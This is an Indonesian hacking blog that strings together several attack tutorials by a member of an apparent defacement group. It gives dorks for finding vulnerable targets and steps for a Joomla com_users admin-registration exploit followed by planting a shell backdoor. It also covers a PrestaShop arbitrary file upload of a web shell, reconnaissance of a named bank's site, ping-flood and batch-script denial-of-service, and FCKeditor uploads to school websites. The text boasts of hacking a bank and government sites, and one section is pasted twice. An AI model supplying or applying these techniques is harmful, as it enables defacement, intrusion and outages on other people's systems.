CARA DEFACE WEBSITE DENGAN TEHNIK COM_USER

Cara Deface Website Dengan Tehnik Com_User -  buat lu yang gak tau apa itu deface monggo baca " Pengertian Deface " . Deface Web kali ini menitik beratkan kepada Joomla , nah joomla itu sistem manajemen konten berbasis CMS lebih dikenalnya . 

Nah untuk tehnik Com_User kali ini berlaku untuk Joomla versi 1.6.x. | 1.7.x. | 2.5.x. | , Nah sekarang mari kita lanjut ke tutorial :

[+] Bahan Yang Lu Butuhkan Sebelum Mengikuti Tutorial Ini [+]
(.) Exploit Joomla > Unduh Disini

-Tutorial
1. Sekarang lu cari target Pake Google Dork diatas , contoh liat gambar dibawah

2. Kalo sekarang lu tes apakah cms nya joomla , tambahin administrator dibelakang webnya contoh www.target.we.id/administrator hanya contoh
3. Cek dulu webnya vuln ape kagak , seperti gambar dibawah ini

Ini Menandakan Kalau Web nya Vuln

Kalau yang ini menandakan kurang vuln

<-> Catatan : Vuln atau enggak nya keliatan dari jarak footer admin loginnya kalau dekat seperti gambar pertama berarti vuln dan kalau jauh bukan berarti itu gak vuln , tapi kemungkinan web itu bisa dideface hanya 40% dan sebaliknya jelas ?

4. Nah kalau lu udah dapetin web yang vuln sekarang kita tambahin deh alamat palsu ke url nya user registration

(.) index.php?option=com_users&view=registration

(.) Gw ambil contoh | http://www.target.co/index.php/utiliser-joomla/utiliser-extensions/composants/composant-flux-rss/un-flux-rss

(.) Gw ganti jadi | http://www.target.web.id/index.php?option=com_users&view=registration maka jadinya begini cuy

<-> Catatan lagi neh , misal kalo lu udah buka halaman registrasi nya tapi dia malah pindah/redirect ke login nah ganti target ! jangan dilanjutin , keseringan orang ngeluh disitu .

5. Kalau udah berhasil masuk form registrasi kayak diatas nah , sekarang lu teken CTRL + UMaka akan tampil seperti gambar dibawah ini

6. Kalau sudah ketik CTRL + F lalu ketik hidden , intinya lu cari tulisan hidden kayak gambar dibawah ini

7.  Nah lu ambil code dari website nya yang dikotakin Nah Kalau udah diambil sekarang buka Exploit Joomla yang lu download tadi . dari gambar diatas lalu pindahin ke exploitnya kayak gambar yang dikotakin dibawah  . klik kanan Open With > Notepad. nah lu ganti code yang ada di Notepad itu sama code Joomla itu yang di kotakin itu | lalu Linknya dari website itu contoh

(.) http://www.target.web.id/index.php?option=com_users&view=registration

8. terus lu ubah email nya sama email lu gw saranin Gmail , nah lu ganti email nya juga kayak yang gw kotakin diatas , username boleh diganti juga , 

9. nah sekarang lu save exploitnya terus buka lewat mozila / chrome klik kanan open with chrome / mozila maka tampilannya gini (ingat biarin passwordnya jangan diubah)

10. Sekarang Lu klik" Register " nah akan mucul tulisan  "Password Tidak sama " dalam bahasa indonesia

11. nah ganti password itu apa kek terserah samain trus klik register lagi , lalu lu periksa email , kalo gak ada periksa di folder Spam

12. udah itu buka lagi login adminnya http://www.gantengers.co/administrator (contoh)

13. masukin Id Password yang ada di email lu 

14. Kalau Berhasil begini tampilannya

15. kalau gagal begini Tampilannya ( semangat cari lagi sampe pagi wkwkw)

16. Terakhir Silahkan Tanam Shell Backdoor Kedalam Web Baca " Cara Tanam Shell Di Web Joomla "

Perlu diingat ini hanya materi pembelajaran tidak lebih dan kurang , saya tekankan saya tidak bertanggung jawab atas apa yang anda lakukan , dosa anda tanggung sendiri jika anda berhasil masuk ke admin loginnya alangkah baiknya anda memberi tau kelemahan web itu kepada adminnya ketimbang menebas nya salam super

PENASARAN DENGAN GARUDA SECURITY HACKER?

emu lagi dengan sy MR.R.S Banyak orang penasaran dengan kami, entah apa alasannya kenaa mereka begitu penasaran ?? mungkin karena saya salah satu orang ganteng di Garuda Security Hacker (maybe). setelah sekian lama kami menjadi tim rahasia, kami mulai muncul ke publik dengan beberapa show off,
Seperti : peretasan website banksumut.com, peretasan website resmi blitar, peretasan ulang website resmi kabupaten garut.

Kami tidak ingin di kenal, karena kami tidak perlu jadi terkenal :)
Kami tidak butuh di ketahui, karena kami ingin di publikasi
Kami hanya ingin bahwa kalian sadar, bahwa kami itu "Ada Dan Nyata!!"

Kami Bukanlah tim underground yang memamerkan hasil peretasannya, ke publik.
Jika kami sedikit show off itu karena kami hanya ingin kalian sadar bahwa kami itu "Ada Dan Nyata!!"
Kami Bukanlah blackhat kami juga bukan whitehat, kami bisa membedakan mana teman dan mana musuh. Kami tidak segan dengan musuh. Kami akan selalu friendly dengan siapapun.

Mulai sekarang kalian yang penasaran dengan kami, bisalah stalking-stalking Fanspage resmi kami :)



Kalian bisa like dan ikuti kegiatan kami ya :)

Sumber: garudasecurityhacker.blogspot.com

Deface Warehouse Prestashop Arbitrary File Upload

Balik lagi sama mimin yg tampan :) kali ini aku share tutorial deface lagi "Deface Warehouse Prestashop Arbitrary File Upload". Sebelumnya ane mau menyampaikan sesuatu dlu.
Pas Kemaren ane liat banyak banget yang berulah lagi ngedeface website yang pakai CMS Lokomedia, kemarin web pemerintah/sekolah nya sekarang web desanya :'( sedih aku ngelihat perilaku Defacer sekarang. ngerusak web dalam negeri terus -_- tp ga semua nya ngerusak ada juga yg ngasih pesan aja ke admin nya. atau nutup tempat login admin :). Ok udah ah curhatnya langsung ke topic kita yaitu "Deface Warehouse Prestashop Arbitrary File Upload". bekicottt

Bahan :
Dork :
sebenernya ane males juga ngasih dork banyak-banyak, bikin orang jadi males mikir + manja
inurl:"/modules/columnadverts/"

CSRF :
Touch me senpai :)Sekarang script deface nya bukan Nabilah JKT yang cantik lagi :v.. sekarang pake logo.
Balik lagi sama mimin yg tampan :) kali ini aku share tutorial deface lagi "Deface Warehouse Prestashop Arbitrary File Upload". Sebelumnya ane mau menyampaikan sesuatu dlu.
Pas Kemaren ane liat banyak banget yang berulah lagi ngedeface website yang pakai CMS Lokomedia, kemarin web pemerintah/sekolah nya sekarang web desanya :'( sedih aku ngelihat perilaku Defacer sekarang. ngerusak web dalam negeri terus -_- tp ga semua nya ngerusak ada juga yg ngasih pesan aja ke admin nya. atau nutup tempat login admin :). Ok udah ah curhatnya langsung ke topic kita yaitu "Deface Warehouse Prestashop Arbitrary File Upload". bekicottt

Bahan :
Dork :
sebenernya ane males juga ngasih dork banyak-banyak, bikin orang jadi males mikir + manja
inurl:"/modules/columnadverts/"

CSRF :
Touch me senpai :)

Exploit :
http://targetsuka.co.li/[path]/modules/columnadverts/uploadimage.php

Step By Step :)
1. Seperti biasa kita dorking :v. eittss dorking nya bukan di bagian 'semua' tapi di bagian gambar !!

Deface Warehouse Prestashop Arbitrary File Upload - Garuda Security Hacker

2. Pilih aja terserah kalian. keberuntungan di tangan kalian. klik gambar setelah terbuka gambarnya. klik kanan terus pilih "Copy Image Location"

3. Buka tab baru paste url hasil copy tadi.. masukan exploit seperti contoh di atas

4. Kalo Vuln akan seperti ini !!

Deface Warehouse Prestashop Arbitrary File Upload - Garuda Security Hacker


5. Copy url yang ada di address bar. bukaCSRF Exploiter online tadi :)
Masukan url nya pas di Post Name pilihuserfile. pilih shell lalu submit

Deface Warehouse Prestashop Arbitrary File Upload - Garuda Security Hacker

6. Kalo sukses akan muncul nama file kamu :)

Deface Warehouse Prestashop Arbitrary File Upload - Garuda Security Hacker



7. Akses shell ?? Use Your Brain :)

Tenang di kasih tau kok : http://targetsuka.co.li/[path]/modules/columnadverts/slides/namashell
Jangan Lupa Nitip nick _Tuan2Fay_ dan Garuda Security Hacker :)

Jangan bosen mampir di blog ini ya :)

Exploit :
http://targetsuka.co.li/[path]/modules/columnadverts/uploadimage.php

Step By Step :)
1. Seperti biasa kita dorking :v. eittss dorking nya bukan di bagian 'semua' tapi di bagian gambar !!

Deface Warehouse Prestashop Arbitrary File Upload - Garuda Security Hacker

2. Pilih aja terserah kalian. keberuntungan di tangan kalian. klik gambar setelah terbuka gambarnya. klik kanan terus pilih "Copy Image Location"

3. Buka tab baru paste url hasil copy tadi.. masukan exploit seperti contoh di atas

4. Kalo Vuln akan seperti ini !!

Deface Warehouse Prestashop Arbitrary File Upload - Garuda Security Hacker


5. Copy url yang ada di address bar. bukaCSRF Exploiter online tadi :)
Masukan url nya pas di Post Name pilihuserfile. pilih shell lalu submit

Deface Warehouse Prestashop Arbitrary File Upload - Garuda Security Hacker

6. Kalo sukses akan muncul nama file kamu :)

Deface Warehouse Prestashop Arbitrary File Upload - Garuda Security Hacker



7. Akses shell ?? Use Your Brain :)

Tenang di kasih tau kok : http://targetsuka.co.li/[path]/modules/columnadverts/slides/namashell
Jangan Lupa Nitip nick _Tuan2Fay_ dan Garuda Security Hacker :)

Jangan bosen mampir di blog ini ya :)

Sumber: garudasecurityhacker.blogspot.com

Kali Linux : Mendeteksi Platform Dan Firewall Website

Pada hari ini saya ingin memberikan tutorial sederhana ya kali ini cara mendeteksi platform dan firewall yang berjalan di webserver. ok bagaiman cerita nya langsung saja kita ke TKP

pertama-tama buka dulu terminal

ok kali ini target saya adalahwww.banksumut.com

pertama-tama saya ingin mengetahui platform apa yang berjalan di webserver nya cara nya adalah :

eksekusi perintah di terminalroot@kurumi:~# whatweb [url target]

contoh : root@kurumi:~# whatwebwww.banksumut.com

kemudian tekan enter maka akan muncul seperti gambar dibawah ini.

Informasi dari Platform dan data lain dari webserver nya adalah :

http://www.banksumut.com [200]
Apache[2.2.8]
Blogger
Cookies[PHPSESSID]
Country[INDONESIA][ID]
Google-Analytics[UA-2771016-34,UA-39044080-1]
HTTPServer[Fedora Linux][Apache/2.2.8 (Fedora)]
IP[202.182.174.163]
JQuery, Lightbox
Meta-Author[https://plus.google.com/106126346823763242363?rel=author]
MetaGenerator[blogger]
PHP[5.2.6]
Script[text/javascript]
Title[Memberikan Pelayanan Terbaik]
X-Powered-By[PHP/5.2.6]

ok saya sudah mengetahui platform di webserver nya apa selanjut nya saya ingin mengetahui apakah webserver nya dilindungi firewall apa tidak.

eksekusi perintah di terminalroot@kurumi:~# wafw00f [url target]

contoh :

ada 2 versi dalam mengeksekusi nya.

versi 1 masukkan perintah seperti dibawah ini :

root@kurumi:~# wafw00fwww.banksumut.com

kemudian tekan enter maka akan muncul seperti gambar dibawah ini yang versi 1 ini dijelaskan host www.banksumut.com berada dibalik BIG IP atau yang bisa dibilang Load ballancer penasaran saya lagi malas jelasin nya ne saya kasih informasi nya yang ditulis oleh senior Eko Budihttp://fxekobudi.net/networking/mengenal-teknologi-load-balancing/

ok selanjut nya kita ke versi 2 yang menggunakan perintah

root@kurumi:~# wafw00fbanksumut.com

kemudian tekan enter maka akan muncul seperti gambar dibawah ini.

ya terget saya ternyata dilindungi WAF atau Web Application Firewall bagi yang belum tau apa itu WAF ini silahkan baca penjelasan dari senior Edi Susantohttp://www.kompasiana.com/edysusanto74/mengenal-waf-web-application-firewall_55cb047384afbd67166c6544

ya kira-kira seperti itu lah langkah-langkah untuk mendeteksi pelaform dariwebsite kepada para mastah dan senior mohon koreksinya jika ada kesalahan.

Sumber: bitosi.com

CARA DDOS WEBSITE MENGGUNAKAN CMD

sebelum saya menjelaskan membuat serangan DDOS dengan cmd, saya akan menjelaskan dulu apa itu DOS, apa itu DDOS.

 DoS attack: Denial of Service attack Serangan ini melibatkan satu komputer / koneksi internet untuk (membanjiri) sebuah server dengan paket ICMP/TCP/UDP,tujuan dari serangan ini adalah untuk membuat bandwith server menjadi overload, sehingga server tidak bisa lagi menangani trafik yang masuk dan server akhirnya down
.
 DDoS attack: Distributed Denial of Service attack
DDoS attack hampir sama dengan Dos tetapi perbedaan dari hasil yang disebabkan olehnya sangat berbeda. Serangan DDoS dijalankan menggunakan metode computer yang terdistribusi yang sering disebut dengan 'botnet army', atau biasa juga dikenali dengan komputer "zombie". 

Proses nya dengan cara menginfeksi komputer lain dengan malware yang memberikan akses bagi botnet owner kepada komputer yang terinfeksi. Hal ini bisa berarti, bootnet owner bisa menggunakan resource apa saja dari komputer korban dan menggunakan koneksi komputer tersebut untuk membanjiri (flood) target yang akan diserang. Server yang diserang akan lumpuh sangat cepat karena beberapa koneksi digunakan untuk melawan satu koneksi. Bayangkan ini seperti perkelahian. jika 1 lawan 1 maka kemungkinan menangnya 50:50, tapi jika 1000 lawan 1 ? matilah kita. Sebetulnya banyak software untuk men-generate serangan DOS, tapi kali ini saya akan mencoba men-generate serangan DOS melalui cmd windows. cara yang pertama : ketikan command berikut pada cmd :


 1. Buka CMD


 2. ketik "ping <ip add> -l 50000 -n 5000 -w 0.00001" <ip add> = IP Address situs yang akan di DDoS (bisa diganti dengan alamat situsnya) -l 50000 = besar ping yang dikirim server sebesar 50000bytes (bisa diganti maksimal 65500 bytes) -n 5000 = ukuran buffer yang dikirim 5000 bytes (bisa diganti sesuka hati) -w 0.00001 = waktu tunggu tiap ping 0.00001 milidetik (bisa diganti sesuka hati) 


3. Tekan enter dan tunggu hingga anda mendapatkan pesan "Request timed out" cara yang kedua : 1. Buka Notepad (accesoris -> notepad) 2. tulis script dibawah ini @echo off mode 67,16 title DDOS Attack By http://johangifari.blogspot.com/ color 0b cls echo. echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ echo DDOS With Batchfile By http://johangifari.blogspot.com/ echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ echo. set /p x=Server-Target: echo. echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ping %x% echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ @ping.exe 127.0.0.1 -n 5 -w 1000 > nul goto Next :Next echo. echo. echo. set /p m=ip Host: echo. set /p n=Packet Size: echo. :DDOS color 0d echo Attacking Server %m% ping %m% -i %n% -t >nul goto DDOS 3. Kemudian Save Menggunakan Extensi .Bat (contohDDoS.bat)


 4. setelah itu buka file yang telah kita buat tadi


 5. Server-target isikan dengan nama domain / nama situs yang akan kita DDOS. misal : www.google.com 


6. Setelah kita isikan server-target maka akan muncul alamat ip target, lalu pada ip host isikan ip address target kita 


7. Lalu akan ada packet size, isikan terserah anda. misalkan 1000000000 8. Setelah itu tekan enter maka proses DDOS akan berjalan, DDOS membutuhkan waktu yang lumayan lama tergantung kemampuan situs yang kita DDOS. 

Akan lebih baik kalau kita melakukan DDOS secara serentak atau dengan banyak orang. mudah kan? hehe tapi ingat, ini hanya untuk sekedar pengetahuan saja. jangan dicoba ke website orang lain ya, apalagi website resmi. karena serangan semacam ini cukup untuk membuat kita hidup dibalik jeruji besi ! haha jika anda ingin mencoba serangan DDOS ini, maka cobalah pada sistem yang anda buat sendiri, agar tidak menimbulkan kerugian untuk orang lain semoga bermanfaat ..

CARA DEFACE WEB SEKOLAH DENGAN FCK EDITOR

Ketemu lagi dengan sy MR.R.S 

Kita akan membicarakan soal deface lagi. Web sch.id merupakan web sekolahan milik Indonesia. Dengan menggunakan FCKeditor, kita bisa mengupload sebuah file ke web tersebut seperti halnya mengupload file deface, namun berformat txt. Ok, berikut caranya.
1. Buatlah sebuah file berformat txt dengan notepad, isi dengan kata - kata yang ingin diucapkan layaknya file deface, jangan lupa di save dan beri nama

2. Di pencarian google, masukkan dork berikut :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?

3. Nanti bakalan muncul beberapa situs sekolahan, anda pilih salah satu untuk di eksekusi

4. Silahkan anda masukkan exploit ini /editor/filemanager/connectors/test.html
Contoh: www.site.com/editor/filemanager/connectors/test.html

5. Nanti akan terlihat seperti ini

Cara Deface Web Sch.id Dengan FCKeditor

Sesuai gambar, di kolom connector silahkan anda ganti dengan PHP. Resource type file

6. Klik "pilih file" dan pilih file txt yang sudah dibuat tadi

7. Klik "upload"

8. Jika berhasil akan muncul tulisan kira - kira seperti ini 'file uploaded with no error'

9. Untuk melihat file uploadnya, anda buka webnya dengan www.site.com/userfiles/file/namafilemu.txt

10. Jika berhasil maka nanti akan muncul text yang tadi anda buat di notepad.
Contoh: http://www.smkn1kuta.sch.id/userfiles/file/index(26).txt

Selesai, kini anda berhasil mendeface web tersebut, meski bukan pada indexnya.

WELCOME TO MY BLOG

Blog ini menjelaskan tentang Dunia Hacker .dimana sy akan membagikan tutorial hack seperti cara deface suatu web, tentang DDOS, dan lain lain,  smogah dengan tutorial nanti yg akan sy Kasih bisa di manfaatkan dengan baik dan jangan di salah gunakan.

My friend.. 

Yukinoshita47-4W3W3NK-LYNOC-DAN ALL MEMBER GARUDA SECURITY HACKER.